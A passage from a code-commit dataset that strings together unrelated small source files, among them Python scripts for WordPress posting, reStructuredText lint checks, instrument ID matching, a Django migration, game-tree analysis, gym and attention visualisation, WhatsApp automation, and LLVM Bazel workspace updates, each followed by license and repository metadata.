WIDTH = str(width);
HEIGHT = str(height);
ID = str(WPID);
HTML = "<img src=\"" + SRC + "\" alt=\"" + TITLE + "\" width=\"" + WIDTH + "\" height=\"" + HEIGHT + "\" class=\"alignnone " + sizetype + " wp-image-" + ID + "\" />"
return HTML
#
# post a wordpress post with image
#
def wordpress_post(status,description,title,categories,tags,imageurl,wordpress_blogid,wordpress_bearer_key):
html = wordpress_publish_image(wordpress_blogid,title,imageurl, wordpress_bearer_key)
content = html + "\n" + description
headers = {"Authorization": "bearer " + wordpress_bearer_key }
data = { 'content': content, "status":status, "title":title, "categories":categories, "tags":tags }
try:
response = requests.post("https://public-api.wordpress.com/rest/v1/sites/" + wordpress_blogid + "/posts/new", data=data, headers=headers)
result = response.json()
except:
print "wordpress post catch exception"
result = ""
return result
|
mit
|
Python
|
|
2fdbd208ee6db593df6f8b7c171a716ea3716920
|
Add a checks module
|
stackforge/doc8,openstack/doc8,tschuy/doc8,doismellburning/doc8
|
doc8/checks.py
|
doc8/checks.py
|
# -*- coding: utf-8 -*-
# Copyright (C) 2014 Ivan Melnikov <iv at altlinux dot org>
#
# Author: Joshua Harlow <harlowja@yahoo-inc.com>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
import re
import six
@six.add_metaclass(abc.ABCMeta)
class ContentCheck(object):
@abc.abstractmethod
def report_iter(self, parsed_file):
pass
@six.add_metaclass(abc.ABCMeta)
class LineCheck(object):
@abc.abstractmethod
def report_iter(self, line):
pass
class CheckTrailingWhitespace(LineCheck):
_TRAILING_WHITESPACE_REGEX = re.compile('\s$')
REPORTS = frozenset(["D002"])
def report_iter(self, line):
if self._TRAILING_WHITESPACE_REGEX.search(line):
yield ('D002', 'Trailing whitespace')
class CheckIndentationNoTab(LineCheck):
_STARTING_WHITESPACE_REGEX = re.compile('^(\s+)')
REPORTS = frozenset(["D003"])
def report_iter(self, line):
match = self._STARTING_WHITESPACE_REGEX.search(line)
if match:
spaces = match.group(1)
if '\t' in spaces:
yield ('D003', 'Tabulation used for indentation')
class CheckCarriageReturn(LineCheck):
REPORTS = frozenset(["D004"])
def report_iter(self, line):
if "\r" in line:
yield ('D004', 'Found literal carriage return')
|
apache-2.0
|
Python
|
|
44ef28ee6272c1b65b64ec2f1d54d8fbc592664c
|
Add script to match instrument IDs to MIMO and Wikidata
|
CarnegieHall/linked-data
|
scripts/match_mimoInstruments.py
|
scripts/match_mimoInstruments.py
|
# !/usr/local/bin/python3.4.2
# ----Copyright (c) 2017 Carnegie Hall | The MIT License (MIT)----
# ----For the full license terms, please visit https://github.com/CarnegieHall/linked-data/blob/master/LICENSE----
## Argument[0] is script to run
## Argument[1] is path to csv of Wikidata query results w/MIMO and MBZ IDs
## Argument[2] is path to csv file of CH instrument IDs, labels, MBZ links
## from CH-LOD
import csv
import json
import os
import sys
##from fuzzywuzzy import fuzz
##from fuzzywuzzy import process
from rdflib import Graph, Literal, Namespace, URIRef
from rdflib.namespace import FOAF, RDF, RDFS, SKOS, XSD
from rdflib.plugins.serializers.nt import NTSerializer
filePath_1 = sys.argv[1]
filePath_2 = sys.argv[2]
wikidataInstr_dict = {}
chInstr_dict = {}
ch_toMIMO_Dict = {}
g = Graph()
##def fuzzy_match(x, choices, scorer, cutoff):
## return process.extractOne(
## x, choices=choices, scorer=scorer, score_cutoff=cutoff
## )
with open(filePath_1, 'rU') as f1:
wikidataInstr = csv.reader(f1, dialect='excel', delimiter=',', quotechar='"')
next(wikidataInstr, None)
for row in wikidataInstr:
wikidataID = row[0]
wikidataLabel = row[1]
mbzID = row[2]
mimoID = row[3]
wikidataInstr_dict[str(mbzID)] = {}
wikidataInstr_dict[str(mbzID)]['label'] = wikidataLabel
wikidataInstr_dict[str(mbzID)]['wikidataID'] = wikidataID
wikidataInstr_dict[str(mbzID)]['mimo'] = mimoID
with open(filePath_2, 'rU') as f2:
chInstruments = csv.reader(f2, dialect='excel', delimiter=',', quotechar='"')
next(chInstruments, None)
for row in chInstruments:
chID = row[0]
chLabel = row[1]
mbzID = row[2]
if mbzID in wikidataInstr_dict.keys():
wikidataLabel = wikidataInstr_dict[str(mbzID)]['label']
wikidataID = wikidataInstr_dict[str(mbzID)]['wikidataID']
mimoID = wikidataInstr_dict[str(mbzID)]['mimo']
ch_toMIMO_Dict[str(chID)] = {}
ch_toMIMO_Dict[str(chID)]['chLabel'] = chLabel
ch_toMIMO_Dict[str(chID)]['wikidataLabel'] = wikidataLabel
ch_toMIMO_Dict[str(chID)]['wikidataID'] = wikidataID
ch_toMIMO_Dict[str(chID)]['mimoID'] = mimoID
g.add( (URIRef(chID), SKOS.exactMatch, URIRef(mimoID)) )
g.add( (URIRef(chID), SKOS.exactMatch, URIRef(wikidataID)) )
ch_toMIMO_Dict_path = os.path.join(
os.path.dirname(__file__), os.pardir, 'JSON_dicts', 'ch_toMIMO_Dict.json')
ch_toMIMO_Graph_path = os.path.join(
os.path.dirname(__file__), os.pardir, 'graphs', 'ch_toMIMO_Graph.nt')
g.bind("skos", SKOS)
g = g.serialize(destination=ch_toMIMO_Graph_path, format='nt')
with open(ch_toMIMO_Dict_path, 'w') as f1:
json.dump(ch_toMIMO_Dict, f1)
print(json.dumps(ch_toMIMO_Dict, indent=4))
print("Finished finding matches to MIMO instrument IDs")
|
mit
|
Python
|
|
000a952d38badc8ee245f26e13a5fb38838e68ec
|
Add datamigration for django-parler-1.0git
|
ixc/django-fluent-contents,jpotterm/django-fluent-contents,pombredanne/django-fluent-contents,edoburu/django-fluent-contents,edoburu/django-fluent-contents,django-fluent/django-fluent-contents,pombredanne/django-fluent-contents,ixc/django-fluent-contents,jpotterm/django-fluent-contents,jpotterm/django-fluent-contents,edoburu/django-fluent-contents,django-fluent/django-fluent-contents,django-fluent/django-fluent-contents,pombredanne/django-fluent-contents,ixc/django-fluent-contents
|
fluent_contents/plugins/sharedcontent/migrations/0005_upgrade_to_django_parler10.py
|
fluent_contents/plugins/sharedcontent/migrations/0005_upgrade_to_django_parler10.py
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# The automatically generated model name was changed, table layout remains the same.
# This migration only updates the frozen model definitions.
pass
def backwards(self, orm):
pass
models = {
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'fluent_contents.contentitem': {
'Meta': {'ordering': "('placeholder', 'sort_order')", 'object_name': 'ContentItem'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language_code': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '15', 'db_index': 'True'}),
'parent_id': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'parent_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
'placeholder': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'contentitems'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': "orm['fluent_contents.Placeholder']"}),
'polymorphic_ctype': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'polymorphic_fluent_contents.contentitem_set'", 'null': 'True', 'to': u"orm['contenttypes.ContentType']"}),
'sort_order': ('django.db.models.fields.IntegerField', [], {'default': '1', 'db_index': 'True'})
},
'fluent_contents.placeholder': {
'Meta': {'unique_together': "(('parent_type', 'parent_id', 'slot'),)", 'object_name': 'Placeholder'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'parent_id': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'parent_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']", 'null': 'True', 'blank': 'True'}),
'role': ('django.db.models.fields.CharField', [], {'default': "'m'", 'max_length': '1'}),
'slot': ('django.db.models.fields.SlugField', [], {'max_length': '50'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'})
},
u'sharedcontent.sharedcontent': {
'Meta': {'object_name': 'SharedContent'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'})
},
u'sharedcontent.sharedcontentitem': {
'Meta': {'ordering': "('placeholder', 'sort_order')", 'object_name': 'SharedContentItem', 'db_table': "u'contentitem_sharedcontent_sharedcontentitem'", '_ormbases': ['fluent_contents.ContentItem']},
u'contentitem_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['fluent_contents.ContentItem']", 'unique': 'True', 'primary_key': 'True'}),
'shared_content': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'shared_content_items'", 'to': u"orm['sharedcontent.SharedContent']"})
},
u'sharedcontent.sharedcontenttranslation': {
'Meta': {'unique_together': "[('language_code', 'master')]", 'object_name': 'SharedContentTranslation', 'db_table': "u'sharedcontent_sharedcontent_translation'"},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language_code': ('django.db.models.fields.CharField', [], {'max_length': '15', 'db_index': 'True'}),
'master': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'translations'", 'null': 'True', 'to': u"orm['sharedcontent.SharedContent']"}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'})
}
}
complete_apps = ['sharedcontent']
|
apache-2.0
|
Python
|
|
dbcaa9f2cda37269cd5dfca1166394f71bb3adfc
|
Create Example5.py
|
cpgoncalves/gameplayer
|
Example5.py
|
Example5.py
|
# Carlos Pedro Gonçalves (2015), Game Theory with Python
# Game Theory and Applied A.I. Classes
# Instituto Superior de Ciências Sociais e Políticas (ISCSP)
# University of Lisbon
# cgoncalves@iscsp.ulisboa.pt
#
# New Entrant vs Market Leader (payoffs correspond to strategic value)
#
# For more details see the user manual that comes with the package:
# Gonçalves, C.P. (2015) "Game Player User Manual - A Game Theory Analyzer With Python",
# https://sites.google.com/site/autonomouscomputingsystems/game-player
import gamep # import the game player main module
tree = [] # setup the game tree
# design the tree in accordance with the problem:
# the "No move" is added at a given level whenever the player has no alternative choice
# this allows us to deal with a tree with different branch lengths
gamep.createPath(["Enter","Propose partnership","Accept partnership","No move"], [5,3],tree)
gamep.createPath(["Enter","Propose partnership","Reject partnership","Fight"], [-2,3.5],tree)
gamep.createPath(["Enter","Propose partnership","Reject partnership","Do not fight"], [4,2],tree)
gamep.createPath(["Enter","Do not propose partnership","Fight","No move"], [-1,3],tree)
gamep.createPath(["Enter","Do not propose partnership","Do not fight","No move"], [4,2],tree)
gamep.createPath(["Do not enter","No move","No move","No move"],[0,5],tree)
gamep.showTree(tree)
# play sequence New Entrant plays in the first two levels then the Market Leader plays
# in the next two levels
plays = [0,0,1,1]
gamep.evaluateTree(tree,plays) # evaluate the game tree
|
mit
|
Python
|
|
f0e1fc1751b20019e87cc50085c1350806b02f9f
|
Add missing visualizer module
|
explosion/thinc,explosion/thinc,spacy-io/thinc,spacy-io/thinc,explosion/thinc,spacy-io/thinc,explosion/thinc
|
thinc/extra/visualizer.py
|
thinc/extra/visualizer.py
|
''' A visualizer module for Thinc '''
import seaborn
import matplotlib.pyplot as plt
def visualize_attention(x, y, weights, layer='Encoder', self_attn=True):
'''
Visualize self/outer attention
Args:
x: sentence
y: sentence
weights: (nH, nL, nL)
'''
def heatmap(x, y, data, ax):
seaborn.heatmap(data, square=True, xticklabels=y, yticklabels=x, vmin=0.0, vmax=1.0,
cbar_kws = dict(use_gridspec=False, location="top"),
ax=ax)
num = min(weights.shape[0], 4)
fig, axs = plt.subplots(1, num)
attn_type = 'self attention' if self_attn else 'outer attention'
fig.suptitle('{} {} for all the heads'.format(layer, attn_type))
if len(weights.shape) == 3:
for i in range(num):
heatmap(x, y, weights[i], axs[i])
else:
raise ValueError("Wrong input weights dimensions")
plt.show()
|
mit
|
Python
|
|
0a23dddae52c861ef8f359affc71c082e970c9a5
|
Create WhatsApp.py
|
Ganeshrockz/WhatsApp
|
WhatsApp.py
|
WhatsApp.py
|
from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.by import By
import time
# Replace below path with the absolute path
# to chromedriver in your computer
driver = webdriver.Chrome('/home/saket/Downloads/chromedriver')
driver.get("https://web.whatsapp.com/")
wait = WebDriverWait(driver, 600)
# Replace 'Friend's Name' with the name of your friend
# or the name of a group
target = '"Friend\'s Name"'
# Replace the below string with your own message
string = "Message sent using Python!!!"
arg = '//span[contains(@title,' + target + ')]'
group = wait.until(EC.presence_of_element_located((
By.XPATH, arg)))
group.click()
inp = '//div[@class="input"][@dir="auto"][@data-tab="1"]'
input = wait.until(EC.presence_of_element_located((
By.XPATH, inp_xpath)))
for i in range(100):
input.send_keys(string + Keys.ENTER)
time.sleep(1)
|
mit
|
Python
|
|
927c9bcb0beab4f8fd6c2003573316906ad9dee3
|
add init file
|
wanghuafeng/spider_tools,wanghuafeng/spider_tools
|
__init__.py
|
__init__.py
|
#!-*- coding:utf-8 -*-
|
mit
|
Python
|
|
1ab69075e39ad52674ffa52b86f64839f24d9016
|
Update merge person tool
|
barberscore/barberscore-api,barberscore/barberscore-api,dbinetti/barberscore-django,dbinetti/barberscore,barberscore/barberscore-api,dbinetti/barberscore-django,dbinetti/barberscore,barberscore/barberscore-api
|
project/apps/api/management/commands/merge_persons.py
|
project/apps/api/management/commands/merge_persons.py
|
from optparse import make_option
from django.core.management.base import (
BaseCommand,
CommandError,
)
from apps.api.models import (
Person,
Singer,
Director,
Arranger,
)
class Command(BaseCommand):
help = "Merge selected singers by name"
option_list = BaseCommand.option_list + (
make_option(
"-o",
"--old",
dest="old",
help="specify old name",
),
)
option_list = option_list + (
make_option(
"-n",
"--new",
dest="new",
help="specify new name",
),
)
def handle(self, *args, **options):
# make sure file option is present
if options['old'] is None:
raise CommandError("Option `--old=...` must be specified.")
if options['new'] is None:
raise CommandError("Option `--new=...` must be specified.")
# make sure both singers exist
try:
new_person = Person.objects.get(
name__iexact=options['new'],
)
except Person.DoesNotExist:
raise CommandError("New person does not exist.")
try:
old_person = Person.objects.get(
name__iexact=options['old'],
)
except Singer.DoesNotExist:
raise CommandError("Old person does not exist.")
# Move related records
for director in old_person.choruses.all():
Director.objects.create(
person=new_person,
contestant=director.contestant,
part=director.part,
)
for singer in old_person.quartets.all():
Singer.objects.create(
person=new_person,
contestant=singer.contestant,
part=singer.part,
)
for arranger in old_person.arrangements.all():
Arranger.objects.create(
person=new_person,
chart=arranger.chart,
part=arranger.part,
)
# remove redundant singer
try:
old_person.delete()
except Exception as e:
raise CommandError("Error deleted old singer: {0}".format(e))
return "Merged {0} into {1}".format(old_person, new_person)
|
bsd-2-clause
|
Python
|
|
fee0bf6ab2fdeab8e81ca3f0381cdcc76454ee28
|
Add openai environment viewer
|
jakejhansen/minesweeper_solver,jakejhansen/minesweeper_solver
|
openai/environments_viewer.py
|
openai/environments_viewer.py
|
import gym
# LunarLanderContinuous-v2
# BipedalWalker-v2
env = gym.make('BipedalWalker-v2')
n_epsiodes = 20
n_timesteps = 100
for i_episode in range(n_epsiodes):
observation = env.reset()
for t in range(n_timesteps):
env.render()
print(observation)
action = env.action_space.sample()
observation, reward, done, info = env.step(action)
if done:
print("Episode finished after {} timesteps".format(t+1))
break
|
mit
|
Python
|
|
17173e7688c7a544678086eb5081051e90b3510b
|
Make gui.util a package.
|
MaxOLydian/OctoPrint,JackGavin13/octoprint-test-not-finished,MoonshineSG/OctoPrint,bicephale/OctoPrint,DanLipsitt/OctoPrint,Javierma/OctoPrint-TFG,sstocker46/OctoPrint,Jaesin/OctoPrint,abinashk-inf/AstroBox,abinashk-inf/AstroBox,EZ3-India/EZ-Remote,MoonshineSG/OctoPrint,MolarAmbiguity/OctoPrint,shohei/Octoprint,aerickson/OctoPrint,EZ3-India/EZ-Remote,ymilord/OctoPrint-MrBeam,masterhou/OctoPrint,mcanes/OctoPrint,ryanneufeld/OctoPrint,nickverschoor/OctoPrint,punkkeks/OctoPrint,hudbrog/OctoPrint,skieast/OctoPrint,senttech/OctoPrint,jneves/OctoPrint,d42/octoprint-fork,alephobjects/Cura,ymilord/OctoPrint-MrBeam,ymilord/OctoPrint-MrBeam,Jaesin/OctoPrint,alex1818/OctoPrint,masterhou/OctoPrint,Jaesin/OctoPrint,nicanor-romero/OctoPrint,nicanor-romero/OctoPrint,bicephale/OctoPrint,eddieparker/OctoPrint,shaggythesheep/OctoPrint,3dprintcanalhouse/octoprint2,ErikDeBruijn/OctoPrint,Jaesin/OctoPrint,madhuni/AstroBox,eliasbakken/OctoPrint,JackGavin13/octoprint-test-not-finished,dragondgold/OctoPrint,shohei/Octoprint,masterhou/OctoPrint,eddieparker/OctoPrint,madhuni/AstroBox,alex1818/OctoPrint,Voxel8/OctoPrint,uuv/OctoPrint,Mikk36/OctoPrint,dansantee/OctoPrint,C-o-r-E/OctoPrint,Javierma/OctoPrint-TFG,Catrodigious/OctoPrint-TAM,AstroPrint/AstroBox,abinashk-inf/AstroBox,chriskoz/OctoPrint,AstroPrint/AstroBox,beeverycreative/BEEweb,Salandora/OctoPrint,jneves/OctoPrint,shaggythesheep/OctoPrint,Javierma/OctoPrint-TFG,alephobjects/Cura,mayoff/OctoPrint,rurkowce/octoprint-fork,Salandora/OctoPrint,javivi001/OctoPrint,MoonshineSG/OctoPrint,nickverschoor/OctoPrint,CapnBry/OctoPrint,senttech/OctoPrint,alephobjects/Cura,uuv/OctoPrint,Mikk36/OctoPrint,eddieparker/OctoPrint,madhuni/AstroBox,SeveQ/OctoPrint,Voxel8/OctoPrint,nicanor-romero/OctoPrint,Salandora/OctoPrint,Catrodigious/OctoPrint-TAM,JackGavin13/octoprint-test-not-finished,shohei/Octoprint,SeveQ/OctoPrint,spapadim/OctoPrint,mayoff/OctoPrint,senttech/OctoPrint,ymilord/OctoPrint-MrBeam,MolarAmbiguity/OctoPrint,abinashk-inf/AstroBox,beeverycreative/BEEweb,shaggythesheep/OctoPrint,C-o-r-E/OctoPrint,mcanes/OctoPrint,nickverschoor/OctoPrint,markwal/OctoPrint,CapnBry/OctoPrint,eliasbakken/OctoPrint,Voxel8/OctoPrint,dragondgold/OctoPrint,dansantee/OctoPrint,markwal/OctoPrint,3dprintcanalhouse/octoprint2,foosel/OctoPrint,senttech/OctoPrint,dansantee/OctoPrint,Javierma/OctoPrint-TFG,hudbrog/OctoPrint,javivi001/OctoPrint,shohei/Octoprint,chriskoz/OctoPrint,aerickson/OctoPrint,CapnBry/OctoPrint,aerickson/OctoPrint,rurkowce/octoprint-fork,CapnBry/OctoPrint,C-o-r-E/OctoPrint,SeveQ/OctoPrint,uuv/OctoPrint,javivi001/OctoPrint,Skeen/OctoPrint,chriskoz/OctoPrint,punkkeks/OctoPrint,3dprintcanalhouse/octoprint1,mcanes/OctoPrint,Skeen/OctoPrint,punkkeks/OctoPrint,mrbeam/OctoPrint,d42/octoprint-fork,jneves/OctoPrint,markwal/OctoPrint,bicephale/OctoPrint,beeverycreative/BEEweb,ErikDeBruijn/OctoPrint,foosel/OctoPrint,eliasbakken/OctoPrint,ryanneufeld/OctoPrint,3dprintcanalhouse/octoprint1,bicephale/OctoPrint,Mikk36/OctoPrint,mayoff/OctoPrint,alex1818/OctoPrint,Catrodigious/OctoPrint-TAM,MolarAmbiguity/OctoPrint,MoonshineSG/OctoPrint,sstocker46/OctoPrint,Skeen/OctoPrint,EZ3-India/EZ-Remote,dragondgold/OctoPrint,hudbrog/OctoPrint,beeverycreative/BEEweb,leductan-nguyen/RaionPi,skieast/OctoPrint,madhuni/AstroBox,mrbeam/OctoPrint,sstocker46/OctoPrint,leductan-nguyen/RaionPi,foosel/OctoPrint,shohei/Octoprint,spapadim/OctoPrint,leductan-nguyen/RaionPi,spapadim/OctoPrint,skieast/OctoPrint,MaxOLydian/OctoPrint,ErikDeBruijn/OctoPrint,leductan-nguyen/RaionPi,MaxOLydian/OctoPrint,mrbeam/OctoPrint,ryanneufeld/OctoPrint,JackGavin13/octoprint-test-not-finished,Salandora/OctoPrint,DanLipsitt/OctoPrint,ymilord/OctoPrint-MrBeam,ryanneufeld/OctoPrint,foosel/OctoPrint,nickverschoor/OctoPrint,AstroPrint/AstroBox,EZ3-India/EZ-Remote,chriskoz/OctoPrint
|
Cura/gui/util/__init__.py
|
Cura/gui/util/__init__.py
|
# coding=utf-8
|
agpl-3.0
|
Python
|
|
fd03d3c8a032e06ff2a84af48f6d23e3b3365695
|
Integrate LLVM at llvm/llvm-project@f011d32c3a62
|
Intel-tensorflow/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,tensorflow/tensorflow-pywrap_tf_optimizer,karllessard/tensorflow,Intel-tensorflow/tensorflow,tensorflow/tensorflow-pywrap_saved_model,tensorflow/tensorflow-experimental_link_static_libraries_once,karllessard/tensorflow,Intel-tensorflow/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,yongtang/tensorflow,Intel-tensorflow/tensorflow,paolodedios/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,tensorflow/tensorflow-experimental_link_static_libraries_once,karllessard/tensorflow,tensorflow/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,karllessard/tensorflow,Intel-tensorflow/tensorflow,Intel-tensorflow/tensorflow,yongtang/tensorflow,yongtang/tensorflow,tensorflow/tensorflow-pywrap_saved_model,Intel-tensorflow/tensorflow,Intel-tensorflow/tensorflow,karllessard/tensorflow,karllessard/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,tensorflow/tensorflow,paolodedios/tensorflow,yongtang/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,tensorflow/tensorflow-pywrap_tf_optimizer,paolodedios/tensorflow,tensorflow/tensorflow-pywrap_saved_model,tensorflow/tensorflow-experimental_link_static_libraries_once,tensorflow/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,tensorflow/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,karllessard/tensorflow,tensorflow/tensorflow,tensorflow/tensorflow,tensorflow/tensorflow,Intel-tensorflow/tensorflow,tensorflow/tensorflow-pywrap_saved_model,paolodedios/tensorflow,yongtang/tensorflow,tensorflow/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,paolodedios/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,tensorflow/tensorflow-pywrap_saved_model,tensorflow/tensorflow-experimental_link_static_libraries_once,karllessard/tensorflow,karllessard/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,tensorflow/tensorflow-experimental_link_static_libraries_once,tensorflow/tensorflow-pywrap_tf_optimizer,tensorflow/tensorflow-experimental_link_static_libraries_once,Intel-tensorflow/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,paolodedios/tensorflow,yongtang/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,tensorflow/tensorflow,tensorflow/tensorflow-pywrap_saved_model,tensorflow/tensorflow,tensorflow/tensorflow-pywrap_saved_model,yongtang/tensorflow,karllessard/tensorflow,yongtang/tensorflow,paolodedios/tensorflow,paolodedios/tensorflow,paolodedios/tensorflow,karllessard/tensorflow,yongtang/tensorflow,paolodedios/tensorflow,tensorflow/tensorflow-pywrap_saved_model,yongtang/tensorflow,tensorflow/tensorflow,tensorflow/tensorflow-pywrap_saved_model,yongtang/tensorflow,paolodedios/tensorflow,tensorflow/tensorflow-pywrap_saved_model,tensorflow/tensorflow-pywrap_saved_model,Intel-tensorflow/tensorflow
|
third_party/llvm/workspace.bzl
|
third_party/llvm/workspace.bzl
|
"""Provides the repository macro to import LLVM."""
load("//third_party:repo.bzl", "tf_http_archive")
def repo(name):
"""Imports LLVM."""
LLVM_COMMIT = "f011d32c3a625eb86d1e33a70100b0a031f5fcd4"
LLVM_SHA256 = "b3ec1a2253da80c473df9addacc6ff5b7cfc3a788043a1c59480a93fd0d6fe0e"
tf_http_archive(
name = name,
sha256 = LLVM_SHA256,
strip_prefix = "llvm-project-{commit}".format(commit = LLVM_COMMIT),
urls = [
"https://storage.googleapis.com/mirror.tensorflow.org/github.com/llvm/llvm-project/archive/{commit}.tar.gz".format(commit = LLVM_COMMIT),
"https://github.com/llvm/llvm-project/archive/{commit}.tar.gz".format(commit = LLVM_COMMIT),
],
build_file = "//third_party/llvm:llvm.BUILD",
patch_file = [
"//third_party/llvm:infer_type.patch", # TODO(b/231285230): remove once resolved
"//third_party/llvm:build.patch",
"//third_party/llvm:macos_build_fix.patch",
],
link_files = {"//third_party/llvm:run_lit.sh": "mlir/run_lit.sh"},
)
|
"""Provides the repository macro to import LLVM."""
load("//third_party:repo.bzl", "tf_http_archive")
def repo(name):
"""Imports LLVM."""
LLVM_COMMIT = "3cd5696a33095fe41c8c63f933d239f2c0dbb36e"
LLVM_SHA256 = "5d6e9211f9886586b20fc4c88e9c72833fa686212df82957f3d0b67a5c090d23"
tf_http_archive(
name = name,
sha256 = LLVM_SHA256,
strip_prefix = "llvm-project-{commit}".format(commit = LLVM_COMMIT),
urls = [
"https://storage.googleapis.com/mirror.tensorflow.org/github.com/llvm/llvm-project/archive/{commit}.tar.gz".format(commit = LLVM_COMMIT),
"https://github.com/llvm/llvm-project/archive/{commit}.tar.gz".format(commit = LLVM_COMMIT),
],
build_file = "//third_party/llvm:llvm.BUILD",
patch_file = [
"//third_party/llvm:infer_type.patch", # TODO(b/231285230): remove once resolved
"//third_party/llvm:build.patch",
"//third_party/llvm:macos_build_fix.patch",
],
link_files = {"//third_party/llvm:run_lit.sh": "mlir/run_lit.sh"},
)
|
apache-2.0
|
Python
|
8d473ee89ea43e5004b78314c0ca49cde0049980
|
Integrate LLVM at llvm/llvm-project@961fd77687d2
|
tensorflow/tensorflow-experimental_link_static_libraries_once,yongtang/tensorflow,tensorflow/tensorflow,Intel-tensorflow/tensorflow,yongtang/tensorflow,Intel-tensorflow/tensorflow,tensorflow/tensorflow-pywrap_saved_model,karllessard/tensorflow,tensorflow/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,paolodedios/tensorflow,Intel-tensorflow/tensorflow,tensorflow/tensorflow-pywrap_saved_model,yongtang/tensorflow,karllessard/tensorflow,yongtang/tensorflow,tensorflow/tensorflow-pywrap_saved_model,Intel-tensorflow/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,karllessard/tensorflow,Intel-tensorflow/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,karllessard/tensorflow,tensorflow/tensorflow-pywrap_saved_model,tensorflow/tensorflow-pywrap_saved_model,tensorflow/tensorflow,paolodedios/tensorflow,yongtang/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,paolodedios/tensorflow,karllessard/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,paolodedios/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,tensorflow/tensorflow-pywrap_tf_optimizer,karllessard/tensorflow,tensorflow/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,tensorflow/tensorflow-pywrap_saved_model,tensorflow/tensorflow-experimental_link_static_libraries_once,tensorflow/tensorflow-experimental_link_static_libraries_once,tensorflow/tensorflow-pywrap_tf_optimizer,tensorflow/tensorflow,tensorflow/tensorflow-pywrap_saved_model,tensorflow/tensorflow-experimental_link_static_libraries_once,karllessard/tensorflow,tensorflow/tensorflow,tensorflow/tensorflow,tensorflow/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,Intel-tensorflow/tensorflow,paolodedios/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,karllessard/tensorflow,tensorflow/tensorflow-pywrap_saved_model,paolodedios/tensorflow,karllessard/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,Intel-tensorflow/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,paolodedios/tensorflow,paolodedios/tensorflow,Intel-tensorflow/tensorflow,tensorflow/tensorflow,yongtang/tensorflow,Intel-tensorflow/tensorflow,Intel-tensorflow/tensorflow,yongtang/tensorflow,paolodedios/tensorflow,tensorflow/tensorflow,paolodedios/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,tensorflow/tensorflow-pywrap_saved_model,Intel-tensorflow/tensorflow,yongtang/tensorflow,yongtang/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,tensorflow/tensorflow-pywrap_saved_model,tensorflow/tensorflow-experimental_link_static_libraries_once,karllessard/tensorflow,yongtang/tensorflow,tensorflow/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,yongtang/tensorflow,karllessard/tensorflow,paolodedios/tensorflow,tensorflow/tensorflow-pywrap_saved_model,tensorflow/tensorflow-experimental_link_static_libraries_once
|
third_party/llvm/workspace.bzl
|
third_party/llvm/workspace.bzl
|
"""Provides the repository macro to import LLVM."""
load("//third_party:repo.bzl", "tf_http_archive")
def repo(name):
"""Imports LLVM."""
LLVM_COMMIT = "961fd77687d27089acf0a09ea29a87fb8ccd7522"
LLVM_SHA256 = "7c225e465ae120daa639ca68339fe7f43796ab08ff0ea893579a067b8f875078"
tf_http_archive(
name = name,
